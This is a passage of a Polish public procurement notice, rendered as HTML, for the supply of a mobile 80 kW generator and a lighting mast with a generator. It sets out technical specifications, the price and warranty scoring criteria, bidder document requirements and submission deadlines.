otrzyma liczbę punktów w zakresie kryterium nr 2 – 30 pkt<br/>•	w przypadku wskazania 5-letniego okresu gwarancji Wykonawca otrzyma maksymalną liczbę punktów w zakresie kryterium nr 2 – 40 pkt.<br/><br/>2.	Maksymalna ilość możliwych do uzyskania punktów we wskazanych kryteriach wynosi 100 pkt.<br/>3.	Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów uzyskanych w ww. kryteriach.<br/>4.	Jeżeli dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i rozruch agregatu prądotwórczego minimum 80 kW na przyczepie<br/>Przedmiot zamówienia stanowi dostawa i rozruch agregatu prądotwórczego na przyczepie o mocy minimalnej 80 kW. <br/><br/>Wyposażenie standardowe:<br/>	Obudowa ze stali zabezpieczonej antykorozyjnie fosforanowaniem , malowana proszkowo,<br/>	Zespół prądotwórczy na stalowej ramie ze zintegrowanym zbiornikiem paliwa<br/>	Przemysłowy silnik wysokoprężny DIESEL w klasie emisji spełniającej aktualne wymogi UE <br/>	Regulator obrotów silnika elektroniczny klasa G2<br/>	Grzałka bloku silnika (podgrzewanie obiegu płynu chłodniczego)<br/>	Bateria akumulatorów z ładowarką buforową i dźwignią rozłączania masy<br/>	Rozrusznik + alternator<br/>	Podstawowe oświetlenie wnętrza w technologii LED<br/> Agregat musi mieć przystosowany panel sterowania do współpracy z automatyką SZR oraz możliwość podłączenia zewnętrznego SZR.<br/>	Grzałka układu sterowania w szafie elektrycznej<br/>	Mikroprocesorowy sterownik z wyświetlaczem LCD<br/>	Sterownik z interfejsem graficznym i menu w języku polskim<br/>	Moc minimalna 80 kW <br/>	Napięcie znamionowe	400/230 V <br/>	Częstotliwość 50Hz<br/>	Czas pracy na pełnym zbiorniku przy 100% obciążenia ok 15h <br/>	stabilizacja obrotów silnika: automatyczna i elektroniczna<br/>	wyposażenia agregatu w następujące gniazda:<br/>63 A 400V IP 67 – 2 szt<br/>32 A 400V IP 67– 1 szt,<br/>16 A 400V IP 67 – 1 szt.<br/>230V – 2 szt.<br/><br/>Prądownica<br/>	Uzbrojenie odporne na środowisko: wilgotne i słone<br/>	Klasa izolacji uzwojeń: H <br/>	Stopień ochrony: IP23<br/>	Regulacja napięcia : elektroniczna.<br/>Cena powinna obejmować również koszt transportu, uruchomienia oraz szkolenia z obsługi.<br/>Każdy przedmiot zamówienia:<br/>– musi być nowy, w pełni sprawny i gotowy do użycia zgodnie z jego przeznaczeniem,<br/>– musi odpowiadać obowiązującym standardom jakościowym i technicznym,<br/>– musi być wolny od jakichkolwiek wad fizycznych i prawnych,<br/>– musi być zgodny z ofertą Wykonawcy,<br/>– nie może być obciążony żadnymi prawami na rzecz osób trzecich,<br/>– musi pochodzić z oficjalnych kanałów dystrybucyjnych producenta, zapewniających<br/>w szczególności realizację uprawnień gwarancyjnych,<br/>– będzie dostarczony przez Wykonawcę na adres wskazany przez Zamawiającego,<br/>Ogłoszenie nr 2025/BZP 00454107/01 z dnia 2025-10-02<br/>2025-10-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>– nie może być przeznaczony przez producenta do wycofania z produkcji lub sprzedaży<br/>w dniu sporządzenia oferty.<br/>Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy,<br/>obowiązującymi przepisami, normami oraz na ustalonych w umowie warunkach.<br/>Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których<br/>mowa w art. 94 ustawy Pzp.<br/>Szczegółowy opis przedmiotów zamówienia znajduje się w załączniku nr 2 do SWZ (dotyczącego CZĘŚCI I, CZĘŚCI II I<br/>CZĘŚCI III), – szczegółowy opis wymaganych parametrów technicznych.<br/>Zadanie finansowanie będzie w całości z dotacji celowej z Programu Ochrony Ludności i Obrony Cywilnej na lata<br/>2025/2026.<br/>W przypadku określenia w dokumentacji zamówienia, w szczególności stanowiącej załącznik nr 2 do niniejszej SWZ<br/>(dotyczący CZĘSCI I, CZĘSCI II, CZĘŚCI III), przedmiotu zamówienia przez wskazanie technologii, producenta, nazw<br/>własnych, znaków towarowych lub pochodzenia urządzeń i materiałów, odniesienie do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych, Zamawiający informuje, że mają one jedynie charakter pomocniczy dla określenia<br/>podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań<br/>równoważnych z zachowaniem tych samych standardów technicznych, technologicznych, jakościowych i funkcjonalnych.<br/>Przez produkty równoważne należy rozumieć urządzenia i materiały posiadające nie gorsze parametry techniczne i te same<br/>cechy funkcjonalne co wskazany konkretny z nazwy czy pochodzenia produkt. Zastosowanie produktów równoważnych w<br/>żaden sposób nie może wpłynąć na prawidłowe funkcjonowanie rozwiązań technicznych. Wykaz zastosowanych i przyjętych<br/>przez Wykonawcę do wyceny materiałów lub urządzeń rozwiązań równoważnych musi zostać załączony do oferty, jeżeli<br/>taka sytuacja będzie miała miejsce. Zgodnie z art. 101 ust. 5 i 6 ustawy Pzp Wykonawca, który powołuje się na rozwiązania<br/>równoważne zobowiązany jest wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają<br/>wymagania określone przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Okres gwarancji 40%<br/>Razem 100%<br/>Oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów.<br/>a) kryterium nr 1 – cena (maksymalnie 60 pkt)<br/>Punkty za kryterium „cena” (1 pkt – 1%) zostaną obliczone w następujący sposób:<br/>najniższa cena oferowana wśród wszystkich<br/>podlegających ocenie ofert<br/>Najniższa cena brutto = --------------------------------------------------------------------------- x 60 pkt<br/>cena zaoferowana w badanej ofercie<br/>b) kryterium nr 2 – okres gwarancji (maksymalnie 40 pkt)<br/>W kryterium „okres gwarancji” ocena zostanie dokonana w oparciu o informacje podane<br/>w formularzu ofertowym (załącznik nr 1 do SWZ). Okres gwarancji na przedmiot zamówienia musi być podany liczbowo w pełnych<br/>latach (tzn. bez możliwości zaoferowania okresu wynoszącego np. 2,5 roku) i nie może być krótszy niż 2 lata:<br/>• w przypadku gdy Wykonawca zaoferuje okres gwarancji krótszy niż 2 lata lub zaoferuje okres gwarancji w niepełnych latach lub w<br/>przypadku gdy Wykonawca nie wskaże okresu gwarancji, oferta Wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust.<br/>1 pkt 5 ustawy Pzp,<br/>• w przypadku wskazania podstawowego 2-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2<br/>– 0 pkt,<br/>• w przypadku wskazania 3-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2 – 20 pkt,<br/>• w przypadku wskazania 4-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2 – 30 pkt<br/>• w przypadku wskazania 5-letniego okresu gwarancji Wykonawca otrzyma maksymalną liczbę punktów w zakresie kryterium nr 2 –<br/>40 pkt.<br/>Ogłoszenie nr 2025/BZP 00454107/01 z dnia 2025-10-02<br/>2025-10-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>2. Maksymalna ilość możliwych do uzyskania punktów we wskazanych kryteriach wynosi 100 pkt.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów<br/>uzyskanych w ww. kryteriach.<br/>4. Jeżeli dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybiera ofertę z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa masztu oświetleniowego automatycznego z agregatem<br/>Przedmiot zamówienia obejmuje dostawę masztu oświetleniowego automatycznego mobilnego z agregatem. <br/>Wyposażenie standardowe:<br/>	oświetlana powierzchnia – 5000 m2<br/>	lampy LED<br/>	maszt – pionowy automatyczny, z możliwością ręcznego wysuwania<br/>	funkcje – obudowa musi być wykonana z trwałego i odpornego na warunki zewnętrzne materiału i zabezpieczona przed opadami atmosferycznymi (deszcz, śnieg).<br/>Dane eksploatacyjne:<br/>	częstotliwość znamionowa – 50/60 Hz, <br/>	napięcie znamionowe – 230/120 VAC,<br/>	moc znamionowa (PRP) – 2,3/2,4 kW,<br/>	temperatura robocza (min/maks.) - -25/50 C,<br/>	poziom mocy akustycznej (LwA) – 86 dB (A), <br/>	poziom ciśnienia akustycznego(LpA) w odległości 7 m- 63 dB(A).<br/>Źródło energii:<br/>	typ – silnik wysokoprężny musi być wykonany zgodnie z aktualnymi wymaganiami UE<br/>w zakresie emisji spalin STAGE V<br/>	prędkość – 1500/1800 obr./min,<br/> maks. moc znamionowa (PRP) – 2,7/3 kW, <br/>Alternator:<br/>	moc znamionowa – 3/4 kVA<br/>	izolacja/ ochronna obudowa – H/23 (klasa/IP).<br/>Zużycie paliwa:<br/>	pojemność zbiornika paliwa – min. 70 l,<br/>	czas autonomicznej pracy – 130-150 h. <br/>Moc wyjściowa:<br/>	dodatkowa moc – nie mniej niż 1 kW.<br/>Oświetlenie:<br/>	reflektory – LED<br/>	moc – 4 x 320 - 350 W<br/>Maszt:<br/>	typ – automatyczny pionowy, 5 odcinków<br/>	obrót – min. 330 stopni<br/>	maksymalna wysokość – 7,5m do 8,5 m<br/>	maksymalna prędkość wiatru – 80 km/h<br/>Obudowa i przyczepa:<br/>	typ – homologacja drogowa UE lub przyczepa przeznaczona do użycia na miejscu <br/>	z 4-punktowym systemem poziomowania, przystosowana do holowania po drogach publicznych oraz posiadająca homologację do holowania po drogach publicznych<br/>	rama podstawowa – rama zapobiegająca wyciekom<br/>	obudowa – drzwi otwierane do góry lub z boku<br/>Cena powinna obejmować również koszt transportu, uruchomienia oraz szkolenia z obsługi. <br/>2.	Przedmiot zamówienia:<br/> – musi być nowy, w pełni sprawny i gotowy do użycia zgodnie z jego przeznaczeniem,<br/> – musi odpowiadać obowiązującym standardom jakościowym i technicznym,<br/> – musi być wolny od jakichkolwiek wad fizycznych i prawnych,<br/> – musi być zgodny z ofertą Wykonawcy,<br/> – nie może być obciążony żadnymi prawami na rzecz osób trzecich,<br/> – musi pochodzić z oficjalnych kanałów dystrybucyjnych producenta, zapewniających <br/>w szczególności realizację uprawnień gwarancyjnych,<br/> – będzie dostarczony przez Wykonawcę na adres wskazany przez Zamawiającego,<br/>– nie może być przeznaczony przez producenta do wycofania z produkcji lub sprzedaży <br/>w dniu sporządzenia oferty.<br/>3.	Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy, obowiązującymi przepisami, normami oraz na ustalonych w umowie warunkach.<br/>6.	Szczegółowy opis przedmiotów zamówienia znajduje się w załącznikach:<br/>Załącznik nr 2 do SWZ dotyczy CZĘŚCI I,<br/>Załącznik nr 2 do SWZ dotyczy CZĘŚCI II,<br/>Załącznik nr 2 do SWZ dotyczy CZĘŚCI III.<br/>7.	W przypadku określenia w dokumentacji zamówienia, w szczególności stanowiącej załączniki nr 2 do niniejszej SWZ (dotyczący CZĘŚCI I, CZĘŚCI II, CZĘŚCI III), przedmiotu zamówienia przez wskazanie technologii, producenta, nazw własnych, znaków towarowych lub pochodzenia urządzeń i materiałów, odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, Zamawiający informuje, że mają one jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych z zachowaniem tych samych standardów technicznych, technologicznych, jakościowych i funkcjonalnych. Przez produkty równoważne należy rozumieć urządzenia i materiały posiadające nie gorsze parametry techniczne i te same cechy funkcjonalne co wskazany konkretny z nazwy czy pochodzenia produkt. Zastosowanie produktów równoważnych w żaden sposób nie może wpłynąć na prawidłowe funkcjonowanie rozwiązań technicznych. Wykaz zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeń rozwiązań równoważnych musi zostać załączony do oferty, jeżeli taka sytuacja będzie miała miejsce. Zgodnie z art. 101 ust. 5 i 6 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne zobowiązany jest wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Okres gwarancji 40%<br/>Razem 100%<br/>Oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów.<br/>a) kryterium nr 1 – cena (maksymalnie 60 pkt)<br/>Punkty za kryterium „cena” (1 pkt – 1%) zostaną obliczone w następujący sposób:<br/>najniższa cena oferowana wśród wszystkich<br/>podlegających ocenie ofert<br/>Najniższa cena brutto = --------------------------------------------------------------------------- x 60 pkt<br/>cena zaoferowana w badanej ofercie<br/>b) kryterium nr 2 – okres gwarancji (maksymalnie 40 pkt)<br/>W kryterium „okres gwarancji” ocena zostanie dokonana w oparciu o informacje podane<br/>w formularzu ofertowym (załącznik nr 1 do SWZ). Okres gwarancji na przedmiot zamówienia musi być podany liczbowo w pełnych<br/>latach (tzn. bez możliwości zaoferowania okresu wynoszącego np. 2,5 roku) i nie może być krótszy niż 2 lata:<br/>• w przypadku gdy Wykonawca zaoferuje okres gwarancji krótszy niż 2 lata lub zaoferuje okres gwarancji w niepełnych latach lub w<br/>przypadku gdy Wykonawca nie wskaże okresu gwarancji, oferta Wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust.<br/>1 pkt 5 ustawy Pzp,<br/>• w przypadku wskazania podstawowego 2-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2<br/>– 0 pkt,<br/>• w przypadku wskazania 3-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2 – 20 pkt,<br/>• w przypadku wskazania 4-letniego okresu gwarancji Wykonawca otrzyma liczbę punktów w zakresie kryterium nr 2 – 30 pkt<br/>• w przypadku wskazania 5-letniego okresu gwarancji Wykonawca otrzyma maksymalną liczbę punktów w zakresie kryterium nr 2 –<br/>40 pkt.<br/>Ogłoszenie nr 2025/BZP 00454107/01 z dnia 2025-10-02<br/>2025-10-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>2. Maksymalna ilość możliwych do uzyskania punktów we wskazanych kryteriach wynosi 100 pkt.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów wyliczoną jako sumę punktów<br/>uzyskanych w ww. kryteriach.<br/>4. Jeżeli dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybiera ofertę z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia przez Wykonawcę przedmiotowego środka dowodowego.<br/>2.	W związku z art. 106 ustawy Pzp Zamawiający żąda innych niż wskazane w art. 104 i art. 105 ustawy Pzp przedmiotowych środków dowodowych na potwierdzenie, że oferowane dostawy spełniają określone przez Zamawiającego wymagania, cechy lub kryteria, jeżeli są one niezbędne do przeprowadzenia postępowania.<br/>3.	W celu potwierdzenia zgodności oferowanego przedmiotu zamówienia z wymaganiami określonymi w opisie przedmiotu zamówienia, Zamawiający żąda złożenia przez Wykonawcę wraz z ofertą przedmiotowego środka dowodowego – formularza specyfikacji technicznej, stanowiącego załącznik nr 2A do SWZ (dotyczącego CZĘŚCI I, CZĘŚCI II I CZĘŚCI III), z zastrzeżeniem, że przedłożony dokument musi zawierać informacje umożliwiające sprawdzenie czy zaoferowany produkt jest zgodny ze szczegółowym opisem wymaganych parametrów technicznych określonych w załączniku nr 2 do SWZ (dotyczącego CZĘŚCI I, CZĘŚCI II I CZĘŚCI III). Wykonawca zobligowany jest do podania parametrów oferowanego przedmiotu zamówienia w załączniku nr 2A do SWZ(dotyczącego CZĘŚCI I, CZĘŚCI II I CZĘŚCI III),.<br/>4.	Zgodnie z art. 107 ust. 2 ustawy Pzp jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>5.	Przepisu art. 107 ust. 2 ustawy Pzp nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>6.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Załącznik nr 2A do SWZ (dotyczący CZĘŚCI I, CZĘŚCI II, CZĘŚCI III) – formularz specyfikacji technicznej. Zgodnie z art. 107 ust. 2 ustawy Pzp jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. Przepisu art. 107 ust. 2 ustawy Pzp nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.1. Do oferty stanowiącej załącznik nr 1 do SWZ (wspólny dla wszystkich części) Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia <br/>z postępowania – zgodnie z załącznikiem nr 3 do SWZ (wspólny dla wszystkich części).<br/>Informacje zawarte w oświadczeniu, o którym mowa powyżej, stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania.<br/>1.2. Pełnomocnictwo (jeśli dotyczy):<br/>•	gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca składający ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy,<br/>•	w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy są zobowiązani do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu <br/>o udzielenie zamówienia tych Wykonawców, należy załączyć do oferty.<br/>1.3. Zastrzeżenie tajemnicy przedsiębiorstwa<br/>W sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, Wykonawca wraz z przekazaniem takich informacji zastrzega, <br/>że nie mogą one być udostępnione oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. <br/>o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 z późn. zm.).<br/>1.4. Formularz specyfikacji technicznej stanowiący przedmiotowy środek dowodowy – załącznik nr 2A do SWZ (dotyczącego CZĘŚCI I, CZĘŚCI II I CZĘŚCI III). Informacje o przedmiotowym środku dowodowym znajdują się w Rozdziale XII SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w<br/>Rozdziale XI ust. 1 pkt. 1.1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia w<br/>postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 454-455 Pzp oraz wskazanym w projektowanych postanowieniach umowy, stanowiących Załącznik Nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-31 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/swiecie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-31 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy przysługują środki ochrony prawnej zgodnie z ustawą Pzp. Środki ochrony prawnej zostały opisane w rozdziale XXXVII SWZ. <br/>Zamawiający nie zastrzega osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>W zakresie nieuregulowanym ustawą Pzp lub niniejszym SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy:<br/>• Rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415 z późn. zm.),<br/><br/>• Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie ( Dz. U. z 2020 r. poz. 2452). <br/><br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy 